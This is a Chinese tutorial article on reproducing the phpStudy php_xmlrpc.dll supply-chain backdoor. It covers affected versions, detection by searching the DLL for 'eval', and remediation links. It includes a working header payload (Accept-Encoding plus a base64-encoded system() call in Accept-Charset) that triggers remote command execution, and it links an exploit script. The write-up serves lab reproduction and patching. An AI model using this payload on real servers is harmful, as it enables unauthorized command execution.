集成环境phpstudy后门怎么利用复现

发布时间:2021-10-11 11:16:30 作者:柒染
来源:亿速云 阅读:163

集成环境phpstudy后门怎么利用复现,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

0x00 简介


phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境

0x01 漏洞概述


使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门(来自雷神众测)

0x02 影响版本


phpStudy20161103版本:

php5.4.45与php5.2.17

phpStudy20180211版本:

php5.4.45与php5.2.17

0x03 环境搭建


公众号回复“phpstudy环境”,解压后无脑安装即可

0x04 漏洞利用


首先检测后门是否存在,后门位置:

\phpstudy\PHPTutorial\php\php-5.2.17\ext\

\phpstudy\PHPTutorial\php\php-5.4.45\ext\

集成环境phpstudy后门怎么利用复现

找到目录下的php_xmlrpc.dll文件,用文本打开,搜索eval关键字:

集成环境phpstudy后门怎么利用复现

如图所示,可判断存在后门

然后用存在漏洞的PHP版本进行启动服务,我使用的是5.4.45,切换版本的位置如图

集成环境phpstudy后门怎么利用复现

然后随意访问一个php文件,拦截数据包,添加如下的请求头字段:

accept-Encoding中逗号后面的空格要去掉

Accept-Charset为system('ipconfig')的base64编码

accept-Encoding:gzip,deflateAccept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

repeater重放数据包,成功触发后门:

集成环境phpstudy后门怎么利用复现

0x05 修复方式


从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll,下载地址:

https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip

https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip

检测工具:

https://www.xp.cn/zijian/

后门利用脚本:

https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp

关于集成环境phpstudy后门怎么利用复现问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

推荐阅读:
  1. phpStudy后门如何检测和修复
  2. 使用 Ghidra 分析 phpStudy 后门

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

phpstudy

上一篇:为什么PHP in_array(0,['a', 'b', 'c']) 返回为true

下一篇:如何进行PhpStorm 代码调试

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》